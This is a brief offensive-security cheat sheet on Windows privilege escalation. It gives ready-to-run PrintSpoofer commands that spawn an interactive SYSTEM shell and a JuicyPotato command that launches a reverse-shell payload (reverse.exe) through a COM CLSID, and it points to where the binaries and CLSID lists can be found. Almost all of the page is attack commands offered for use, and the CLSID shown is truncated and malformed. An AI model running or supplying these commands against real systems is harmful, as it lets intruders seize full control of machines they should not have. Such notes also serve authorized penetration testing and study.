Privilege escalation - commons

PrintSpoofer

Github repo: https://github.com/itm4n/PrintSpoofer

PrintSpoofer.exe -i -c powershell
#OR
PrintSpoofer.exe -i -c cmd

Juicy Potato

JuicyPotato.exe -l 1337 -p reverse.exe -t * -c {03ca98d6-ff5d- 49b8-abc6-03dd84127020

We can find the 64 bits binary for Juicy potato here and the 32 bits (x86) version here.

CLSID for specific Windows version can be found here.

A useful script GetCLSID.ps1 can help us identify valid CLSID on the target system.

Last updated